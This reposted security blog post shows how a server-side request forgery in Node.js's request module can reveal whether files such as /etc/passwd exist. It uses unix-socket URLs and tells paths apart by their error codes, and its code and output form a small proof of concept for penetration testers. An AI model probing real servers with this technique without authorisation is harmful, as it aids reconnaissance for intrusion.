Nytro

Enumerating Files Using Server Side Request Forgery and the request Module


Written by Adam Baldwin with ♥ on 15 December 2017 · 2 min read

If you ever find Server Side Request Forgery (SSRF) in a Node.js application that uses the request module, you can use a special URL format to detect whether a given file or directory exists on the server.

While request does not support the file:// scheme, it does support a special URL format for communicating with unix domain sockets, and the error it returns differs depending on whether the path it is pointed at exists.

The format looks like this: http://unix:SOCKET:PATH. For our purposes we can ignore PATH altogether.

Let’s take this code for example. We’re assuming that as a user we can somehow control the url.

File exists condition:

 
  1. const Request = require('request')
  2.  
  3. Request.get('[http://unix:/etc/passwd'](http://unix:/etc/passwd'), (err) => {
  4. console.log(err)
  5. })

Because /etc/passwd exists, request will try to use it as a unix socket. Of course it is not a unix socket, so the connect call fails with a connection error:

 
  1. { Error: connect **ENOTSOCK** /etc/passwd
  2. at Object._errnoException (util.js:1024:11)
  3. at _exceptionWithHostPort (util.js:1046:20)
  4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
  5. code: 'ENOTSOCK',
  6. errno: 'ENOTSOCK',
  7. syscall: 'connect',
  8. address: '/etc/passwd' }

File does not exist condition:

Using the same code with a different file that does not exist.

 
  1. const Request = require('request')
  2.  
  3. Request.get('[http://unix:/does/not/exist'](http://unix:/etc/passwd'), (err) => {
  4. console.log(err)
  5. })

The resulting error looks like this.

 
  1. { Error: connect **ENOENT** /does/not/exist
  2. at Object._errnoException (util.js:1024:11)
  3. at _exceptionWithHostPort (util.js:1046:20)
  4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
  5. code: 'ENOENT',
  6. errno: 'ENOENT',
  7. syscall: 'connect',
  8. address: '/does/not/exist' }

The difference is small: ENOTSOCK when the path exists, vs ENOENT when it does not.

While not that severe of an issue on its own, it's a trick that's helped me on past security assessments to enumerate file path locations. Maybe you'll find it useful too.

Originally posted on Medium
